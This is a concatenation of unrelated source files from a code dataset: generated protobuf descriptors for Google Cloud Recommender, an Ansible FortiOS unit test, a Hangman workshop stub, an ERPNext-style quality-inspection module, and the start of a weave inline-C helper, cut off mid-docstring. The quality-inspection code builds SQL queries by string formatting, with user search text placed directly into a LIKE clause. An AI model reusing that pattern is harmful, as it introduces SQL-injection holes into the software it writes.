name="MarkRecommendationSucceededRequest",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="state_metadata",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.state_metadata",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="etag",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.etag",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_MARKRECOMMENDATIONSUCCEEDEDREQUEST_STATEMETADATAENTRY],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=761,
serialized_end=992,
)
_MARKRECOMMENDATIONFAILEDREQUEST_STATEMETADATAENTRY = _descriptor.Descriptor(
name="StateMetadataEntry",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.StateMetadataEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.StateMetadataEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.StateMetadataEntry.value",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=706,
serialized_end=758,
)
_MARKRECOMMENDATIONFAILEDREQUEST = _descriptor.Descriptor(
name="MarkRecommendationFailedRequest",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="state_metadata",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.state_metadata",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="etag",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.etag",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_MARKRECOMMENDATIONFAILEDREQUEST_STATEMETADATAENTRY],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=995,
serialized_end=1220,
)
_LISTRECOMMENDATIONSRESPONSE.fields_by_name[
"recommendations"
].message_type = (
google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2._RECOMMENDATION
)
_MARKRECOMMENDATIONCLAIMEDREQUEST_STATEMETADATAENTRY.containing_type = (
_MARKRECOMMENDATIONCLAIMEDREQUEST
)
_MARKRECOMMENDATIONCLAIMEDREQUEST.fields_by_name[
"state_metadata"
].message_type = _MARKRECOMMENDATIONCLAIMEDREQUEST_STATEMETADATAENTRY
_MARKRECOMMENDATIONSUCCEEDEDREQUEST_STATEMETADATAENTRY.containing_type = (
_MARKRECOMMENDATIONSUCCEEDEDREQUEST
)
_MARKRECOMMENDATIONSUCCEEDEDREQUEST.fields_by_name[
"state_metadata"
].message_type = _MARKRECOMMENDATIONSUCCEEDEDREQUEST_STATEMETADATAENTRY
_MARKRECOMMENDATIONFAILEDREQUEST_STATEMETADATAENTRY.containing_type = (
_MARKRECOMMENDATIONFAILEDREQUEST
)
_MARKRECOMMENDATIONFAILEDREQUEST.fields_by_name[
"state_metadata"
].message_type = _MARKRECOMMENDATIONFAILEDREQUEST_STATEMETADATAENTRY
DESCRIPTOR.message_types_by_name[
"ListRecommendationsRequest"
] = _LISTRECOMMENDATIONSREQUEST
DESCRIPTOR.message_types_by_name[
"ListRecommendationsResponse"
] = _LISTRECOMMENDATIONSRESPONSE
DESCRIPTOR.message_types_by_name["GetRecommendationRequest"] = _GETRECOMMENDATIONREQUEST
DESCRIPTOR.message_types_by_name[
"MarkRecommendationClaimedRequest"
] = _MARKRECOMMENDATIONCLAIMEDREQUEST
DESCRIPTOR.message_types_by_name[
"MarkRecommendationSucceededRequest"
] = _MARKRECOMMENDATIONSUCCEEDEDREQUEST
DESCRIPTOR.message_types_by_name[
"MarkRecommendationFailedRequest"
] = _MARKRECOMMENDATIONFAILEDREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ListRecommendationsRequest = _reflection.GeneratedProtocolMessageType(
"ListRecommendationsRequest",
(_message.Message,),
dict(
DESCRIPTOR=_LISTRECOMMENDATIONSREQUEST,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2",
__doc__="""Request for the ``ListRecommendations`` method.
Attributes:
parent:
Required. The container resource on which to execute the
request. Acceptable formats: 1. "projects/[PROJECT\_NUMBER]/l
ocations/[LOCATION]/recommenders/[RECOMMENDER\_ID]", LOCATION
here refers to GCP Locations:
https://cloud.google.com/about/locations/
page_size:
Optional. The maximum number of results to return from this
request. Non-positive values are ignored. If not specified,
the server will determine the number of results to return.
page_token:
Optional. If present, retrieves the next batch of results from
the preceding call to this method. ``page_token`` must be the
value of ``next_page_token`` from the previous response. The
values of other method parameters must be identical to those
in the previous call.
filter:
Filter expression to restrict the recommendations returned.
Supported filter fields: state\_info.state Eg:
\`state\_info.state:"DISMISSED" or state\_info.state:"FAILED"
""",
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.ListRecommendationsRequest)
),
)
_sym_db.RegisterMessage(ListRecommendationsRequest)
ListRecommendationsResponse = _reflection.GeneratedProtocolMessageType(
"ListRecommendationsResponse",
(_message.Message,),
dict(
DESCRIPTOR=_LISTRECOMMENDATIONSRESPONSE,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2",
__doc__="""Response to the ``ListRecommendations`` method.
Attributes:
recommendations:
The set of recommendations for the ``parent`` resource.
next_page_token:
A token that can be used to request the next page of results.
This field is empty if there are no additional results.
""",
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.ListRecommendationsResponse)
),
)
_sym_db.RegisterMessage(ListRecommendationsResponse)
GetRecommendationRequest = _reflection.GeneratedProtocolMessageType(
"GetRecommendationRequest",
(_message.Message,),
dict(
DESCRIPTOR=_GETRECOMMENDATIONREQUEST,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2",
__doc__="""Request to the ``GetRecommendation`` method.
Attributes:
name:
Name of the recommendation.
""",
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.GetRecommendationRequest)
),
)
_sym_db.RegisterMessage(GetRecommendationRequest)
MarkRecommendationClaimedRequest = _reflection.GeneratedProtocolMessageType(
"MarkRecommendationClaimedRequest",
(_message.Message,),
dict(
StateMetadataEntry=_reflection.GeneratedProtocolMessageType(
"StateMetadataEntry",
(_message.Message,),
dict(
DESCRIPTOR=_MARKRECOMMENDATIONCLAIMEDREQUEST_STATEMETADATAENTRY,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.StateMetadataEntry)
),
),
DESCRIPTOR=_MARKRECOMMENDATIONCLAIMEDREQUEST,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2",
__doc__="""Request for the ``MarkRecommendationClaimed`` Method.
Attributes:
name:
Name of the recommendation.
state_metadata:
State properties to include with this state. Overwrites any
existing ``state_metadata``.
etag:
Fingerprint of the Recommendation. Provides optimistic
locking.
""",
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest)
),
)
_sym_db.RegisterMessage(MarkRecommendationClaimedRequest)
_sym_db.RegisterMessage(MarkRecommendationClaimedRequest.StateMetadataEntry)
MarkRecommendationSucceededRequest = _reflection.GeneratedProtocolMessageType(
"MarkRecommendationSucceededRequest",
(_message.Message,),
dict(
StateMetadataEntry=_reflection.GeneratedProtocolMessageType(
"StateMetadataEntry",
(_message.Message,),
dict(
DESCRIPTOR=_MARKRECOMMENDATIONSUCCEEDEDREQUEST_STATEMETADATAENTRY,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.StateMetadataEntry)
),
),
DESCRIPTOR=_MARKRECOMMENDATIONSUCCEEDEDREQUEST,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2",
__doc__="""Request for the ``MarkRecommendationSucceeded`` Method.
Attributes:
name:
Name of the recommendation.
state_metadata:
State properties to include with this state. Overwrites any
existing ``state_metadata``.
etag:
Fingerprint of the Recommendation. Provides optimistic
locking.
""",
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest)
),
)
_sym_db.RegisterMessage(MarkRecommendationSucceededRequest)
_sym_db.RegisterMessage(MarkRecommendationSucceededRequest.StateMetadataEntry)
MarkRecommendationFailedRequest = _reflection.GeneratedProtocolMessageType(
"MarkRecommendationFailedRequest",
(_message.Message,),
dict(
StateMetadataEntry=_reflection.GeneratedProtocolMessageType(
"StateMetadataEntry",
(_message.Message,),
dict(
DESCRIPTOR=_MARKRECOMMENDATIONFAILEDREQUEST_STATEMETADATAENTRY,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.StateMetadataEntry)
),
),
DESCRIPTOR=_MARKRECOMMENDATIONFAILEDREQUEST,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2",
__doc__="""Request for the ``MarkRecommendationFailed`` Method.
Attributes:
name:
Name of the recommendation.
state_metadata:
State properties to include with this state. Overwrites any
existing ``state_metadata``.
etag:
Fingerprint of the Recommendation. Provides optimistic
locking.
""",
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest)
),
)
_sym_db.RegisterMessage(MarkRecommendationFailedRequest)
_sym_db.RegisterMessage(MarkRecommendationFailedRequest.StateMetadataEntry)
DESCRIPTOR._options = None
_MARKRECOMMENDATIONCLAIMEDREQUEST_STATEMETADATAENTRY._options = None
_MARKRECOMMENDATIONSUCCEEDEDREQUEST_STATEMETADATAENTRY._options = None
_MARKRECOMMENDATIONFAILEDREQUEST_STATEMETADATAENTRY._options = None
_RECOMMENDER = _descriptor.ServiceDescriptor(
name="Recommender",
full_name="google.cloud.recommender.v1beta1.Recommender",
file=DESCRIPTOR,
index=0,
serialized_options=_b(
"\312A\032recommender.googleapis.com\322A.https://www.googleapis.com/auth/cloud-platform"
),
serialized_start=1223,
serialized_end=2494,
methods=[
_descriptor.MethodDescriptor(
name="ListRecommendations",
full_name="google.cloud.recommender.v1beta1.Recommender.ListRecommendations",
index=0,
containing_service=None,
input_type=_LISTRECOMMENDATIONSREQUEST,
output_type=_LISTRECOMMENDATIONSRESPONSE,
serialized_options=_b(
"\202\323\344\223\002I\022G/v1beta1/{parent=projects/*/locations/*/recommenders/*}/recommendations"
),
),
_descriptor.MethodDescriptor(
name="GetRecommendation",
full_name="google.cloud.recommender.v1beta1.Recommender.GetRecommendation",
index=1,
containing_service=None,
input_type=_GETRECOMMENDATIONREQUEST,
output_type=google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2._RECOMMENDATION,
serialized_options=_b(
"\202\323\344\223\002I\022G/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}"
),
),
_descriptor.MethodDescriptor(
name="MarkRecommendationClaimed",
full_name="google.cloud.recommender.v1beta1.Recommender.MarkRecommendationClaimed",
index=2,
containing_service=None,
input_type=_MARKRECOMMENDATIONCLAIMEDREQUEST,
output_type=google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2._RECOMMENDATION,
serialized_options=_b(
'\202\323\344\223\002X"S/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}:markClaimed:\001*'
),
),
_descriptor.MethodDescriptor(
name="MarkRecommendationSucceeded",
full_name="google.cloud.recommender.v1beta1.Recommender.MarkRecommendationSucceeded",
index=3,
containing_service=None,
input_type=_MARKRECOMMENDATIONSUCCEEDEDREQUEST,
output_type=google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2._RECOMMENDATION,
serialized_options=_b(
'\202\323\344\223\002Z"U/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}:markSucceeded:\001*'
),
),
_descriptor.MethodDescriptor(
name="MarkRecommendationFailed",
full_name="google.cloud.recommender.v1beta1.Recommender.MarkRecommendationFailed",
index=4,
containing_service=None,
input_type=_MARKRECOMMENDATIONFAILEDREQUEST,
output_type=google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2._RECOMMENDATION,
serialized_options=_b(
'\202\323\344\223\002W"R/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}:markFailed:\001*'
),
),
],
)
_sym_db.RegisterServiceDescriptor(_RECOMMENDER)
DESCRIPTOR.services_by_name["Recommender"] = _RECOMMENDER
# @@protoc_insertion_point(module_scope)
| apache-2.0 |
roadmapper/ansible | test/units/modules/network/fortios/test_fortios_spamfilter_iptrust.py | 21 | 7959 | # Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_spamfilter_iptrust
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_spamfilter_iptrust.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_spamfilter_iptrust_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'spamfilter_iptrust': {
'comment': 'Optional comments.',
'id': '4',
'name': 'default_name_5'
},
'vdom': 'root'}
is_error, changed, response = fortios_spamfilter_iptrust.fortios_spamfilter(input_data, fos_instance)
expected_data = {
'comment': 'Optional comments.',
'id': '4',
'name': 'default_name_5'
}
set_method_mock.assert_called_with('spamfilter', 'iptrust', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_spamfilter_iptrust_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'spamfilter_iptrust': {
'comment': 'Optional comments.',
'id': '4',
'name': 'default_name_5'
},
'vdom': 'root'}
is_error, changed, response = fortios_spamfilter_iptrust.fortios_spamfilter(input_data, fos_instance)
expected_data = {
'comment': 'Optional comments.',
'id': '4',
'name': 'default_name_5'
}
set_method_mock.assert_called_with('spamfilter', 'iptrust', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_spamfilter_iptrust_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'spamfilter_iptrust': {
'comment': 'Optional comments.',
'id': '4',
'name': 'default_name_5'
},
'vdom': 'root'}
is_error, changed, response = fortios_spamfilter_iptrust.fortios_spamfilter(input_data, fos_instance)
delete_method_mock.assert_called_with('spamfilter', 'iptrust', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_spamfilter_iptrust_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'spamfilter_iptrust': {
'comment': 'Optional comments.',
'id': '4',
'name': 'default_name_5'
},
'vdom': 'root'}
is_error, changed, response = fortios_spamfilter_iptrust.fortios_spamfilter(input_data, fos_instance)
delete_method_mock.assert_called_with('spamfilter', 'iptrust', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_spamfilter_iptrust_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'spamfilter_iptrust': {
'comment': 'Optional comments.',
'id': '4',
'name': 'default_name_5'
},
'vdom': 'root'}
is_error, changed, response = fortios_spamfilter_iptrust.fortios_spamfilter(input_data, fos_instance)
expected_data = {
'comment': 'Optional comments.',
'id': '4',
'name': 'default_name_5'
}
set_method_mock.assert_called_with('spamfilter', 'iptrust', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_spamfilter_iptrust_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'spamfilter_iptrust': {
'random_attribute_not_valid': 'tag',
'comment': 'Optional comments.',
'id': '4',
'name': 'default_name_5'
},
'vdom': 'root'}
is_error, changed, response = fortios_spamfilter_iptrust.fortios_spamfilter(input_data, fos_instance)
expected_data = {
'comment': 'Optional comments.',
'id': '4',
'name': 'default_name_5'
}
set_method_mock.assert_called_with('spamfilter', 'iptrust', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| gpl-3.0 |
epeios-q37/epeios | other/exercises/Hangman/workshop/en/k.py | 1 | 1311 | # coding: utf-8
"""
MIT License
Copyright (c) 2019 Claude SIMON (https://q37.info/s/rmnmqd49)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import workshop._.K as workshop
from workshop.en._ import *
def go(globals):
workshop.main(lambda dom: workshop.Core(dom),globals,USER_ITEM_LABELS)
| agpl-3.0 |
saurabh6790/pow-app | buying/doctype/quality_inspection/quality_inspection.py | 30 | 2040 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.model.doc import addchild
class DocType:
def __init__(self, doc, doclist=[]):
self.doc = doc
self.doclist = doclist
def get_item_specification_details(self):
self.doclist = self.doc.clear_table(self.doclist, 'qa_specification_details')
specification = webnotes.conn.sql("select specification, value from `tabItem Quality Inspection Parameter` \
where parent = '%s' order by idx" % (self.doc.item_code))
for d in specification:
child = addchild(self.doc, 'qa_specification_details', 'Quality Inspection Reading', self.doclist)
child.specification = d[0]
child.value = d[1]
child.status = 'Accepted'
def on_submit(self):
if self.doc.purchase_receipt_no:
webnotes.conn.sql("update `tabPurchase Receipt Item` t1, `tabPurchase Receipt` t2 set t1.qa_no = '%s', t2.modified = '%s' \
where t1.parent = '%s' and t1.item_code = '%s' and t1.parent = t2.name" \
% (self.doc.name, self.doc.modified, self.doc.purchase_receipt_no, self.doc.item_code))
def on_cancel(self):
if self.doc.purchase_receipt_no:
webnotes.conn.sql("update `tabPurchase Receipt Item` t1, `tabPurchase Receipt` t2 set t1.qa_no = '', t2.modified = '%s' \
where t1.parent = '%s' and t1.item_code = '%s' and t1.parent = t2.name" \
% (self.doc.modified, self.doc.purchase_receipt_no, self.doc.item_code))
def item_query(doctype, txt, searchfield, start, page_len, filters):
if filters.get("from"):
from webnotes.widgets.reportview import get_match_cond
filters.update({
"txt": txt,
"mcond": get_match_cond(filters["from"], searchfield),
"start": start,
"page_len": page_len
})
return webnotes.conn.sql("""select item_code from `tab%(from)s`
where parent='%(parent)s' and docstatus < 2 and item_code like '%%%(txt)s%%' %(mcond)s
order by item_code limit %(start)s, %(page_len)s""" % filters) | agpl-3.0 |
ioam/svn-history | topo/misc/inlinec.py | 1 | 10466 | """
Interface class for inline C/C++ functions. Based on the SciPy Weave package.
Weave (from SciPy) allows programmers to implement Python methods or
functions using C code written as a string in the Python file. This
is generally done to speed up code that would be slow if written
directly in Python. Because not all users can be assumed to have a
working C/C++ compiler, it is crucial for such optimizations to be
optional. This file provides an interface for processing the inline
C/C++ code in a way that can gracefully revert back to the
unoptimized version when Weave is not available.
The fallback is implemented by making use of the way Python allows
function names to be overwritten, as in these simple examples:
def x(y = 5): return y
def x2(y = 6): return y*y
print 'x:', x(), 'x2:', x2() # Result -- x: 5 x2: 36
x = x2
print 'x:', x(), 'x2:', x2() # Result -- x: 36 x2: 36
In this file, inline() is overwritten to call inline_weave() if Weave
is available. If Weave is not available, inline() will raise a
NotImplementedError exception. For a program to be usable without
Weave, just test inlinec.optimized after defining each optimized
component, replacing it with a non-optimized equivalent if
inlinec.optimized is False.
For more information on weave, see:
http://old.scipy.org/documentation/weave/weaveusersguide.html
Some of the C functions also support OpenMP, which allows them to use
multiple threads automatically on multi-core machines to give better
performance. To enable OpenMP support for those functions, set
openmp=True in the main namespace before importing this file, and
(optionally) set openmp_threads to the number of threads desired. If
openmp_threads is not set, then a thread will be allocated for each
available core by default.
Note that in order to use OpenMP, the C functions are obliged to use the
thread-safe portions of the Python/Numpy C API. In general, the Python
C API cannot be assumed to be thread safe. Calls to PyObject_SetAttrString
are a common hazard which can often be avoided using LOOKUP_FROM_SLOT_OFFSET.
This makes use of Python's __slots__ mechanism with the added benefit of
bypassing the GIL.
$Id$
"""
import collections
import os
from copy import copy
# If import_weave is not defined, or is set to True, will attempt to
# import weave. Set import_weave to False if you want to avoid weave
# altogether, e.g. if your installation is broken.
import __main__
import_weave = __main__.__dict__.get('import_weave',True)
# Dictionary of strings used to allow optional substituions
# (e.g. pragmas) into inline C code.
#
# CB: default value is empty string for convenience of not
# having to do e.g.
# if openmp:
# c_decorators['xyz']='abc'
# else:
# c_decorators['xyz']=''
c_decorators = collections.defaultdict(lambda:'')
# Setting to true will cause OpenMP to be used while compiling some C
# code (search for cfs_loop_pragma to see which routines use
# OpenMP). Good multi-threaded performance requires a machine with
# separate memory subsystems for each core, such as a Xeon. See Marco
# Elver's report at http://homepages.inf.ed.ac.uk/s0787712/stuff/melver_project-report.pdf.
openmp_threads = __main__.__dict__.get('openmp_threads',False)
# Variable that will be used to report whether weave was successfully
# imported (below).
weave_imported = False
# Variable that will be used to report whether simple compilation test
# was successful.
compiled = False
def inline(*params,**nparams): raise NotImplementedError
##########
# Windows: hack to allow weave to work when a user name contains a
# space (see
# http://thread.gmane.org/gmane.comp.python.scientific.devel/14275)
if import_weave:
import sys
if sys.platform.startswith("win"):
try:
# catch the initial use of USERNAME by weave
original_user = os.environ.get("USERNAME")
os.environ["USERNAME"]=original_user.replace(" ","")
# now dynamically patch weave and restore USERNAME
import scipy.weave.catalog
iam = scipy.weave.catalog.whoami().replace(" ","")
scipy.weave.catalog.whoami = lambda: iam
os.environ["USERNAME"]=original_user
except:
pass
##########
try:
if import_weave:
# We supply weave separately with the source distribution, but
# e.g. the ubuntu package uses scipy.
try:
import weave
except ImportError:
from scipy import weave # pyflakes:ignore (try/except import)
weave_imported = True
# Default parameters to add to the inline_weave() call.
inline_named_params = {
'extra_compile_args':['-O2','-Wno-unused-variable -fomit-frame-pointer','-funroll-loops'],
'extra_link_args':['-lstdc++'],
'compiler':'gcc',
'verbose':0}
if openmp_threads != 1:
c_decorators['cfs_loop_pragma']="#pragma omp parallel for schedule(guided, 8)"
inline_named_params['extra_compile_args'].append('-fopenmp')
inline_named_params['extra_link_args'].append('-fopenmp')
def inline_weave(*params,**nparams):
named_params = copy(inline_named_params) # Make copy of defaults.
named_params.update(nparams) # Add newly passed named parameters.
weave.inline(*params,**named_params)
# Overwrites stub definition with full Weave definition
inline = inline_weave
except ImportError:
# CEBALERT: where does 'caution' fit in our warnings system? (Also
# used in other places in this file.)
print 'Caution: Unable to import Weave. Will use non-optimized versions of most components.'
if weave_imported:
import random
try:
# to force recompilation each time
inline('double x=%s;'%random.random())
compiled = True
except Exception, e:
print "Caution: Unable to use Weave to compile: \"%s\". Will use non-optimized versions of most components."%str(e)
# Flag available for all to use to test whether to use the inline
# versions or not.
optimized = weave_imported and compiled
warn_for_each_unoptimized_component = False
# JABALERT: I can't see any reason why this function accepts names rather
# than the more pythonic option of accepting objects, from which names
# can be extracted if necessary.
def provide_unoptimized_equivalent(optimized_name, unoptimized_name, local_dict):
"""
If not using optimization, replace the optimized component with its unoptimized equivalent.
The objects named by optimized_name and unoptimized_name should be
plug-compatible. The local_dict argument should be given the
contents of locals(), so that this function can replace the
optimized version with the unoptimized one in the namespace from
which it has been called.
As an example, calling this function as::
provide_unoptimized_equivalent("sort_opt","sort",locals())
is equivalent to putting the following code directly into the
calling location::
if not optimized:
sort_opt = sort
print 'module: Inline-optimized components not available; using sort instead of sort_opt.'
"""
if not optimized:
local_dict[optimized_name] = local_dict[unoptimized_name]
if warn_for_each_unoptimized_component:
print '%s: Inline-optimized components not available; using %s instead of %s.' \
% (local_dict['__name__'], optimized_name, unoptimized_name)
if not optimized and not warn_for_each_unoptimized_component:
print "Note: Inline-optimized components are currently disabled; see topo.misc.inlinec"
# Definitions useful for working with optimized Python code;
# prepend to the code for an inlinec call if you want to use them.
c_header = """
/* Declaration for interfacing to numpy floats */
typedef double npfloat;
/* For a given class cls and an attribute attr, defines a variable
attr_offset containing the offset of that attribute in the class's
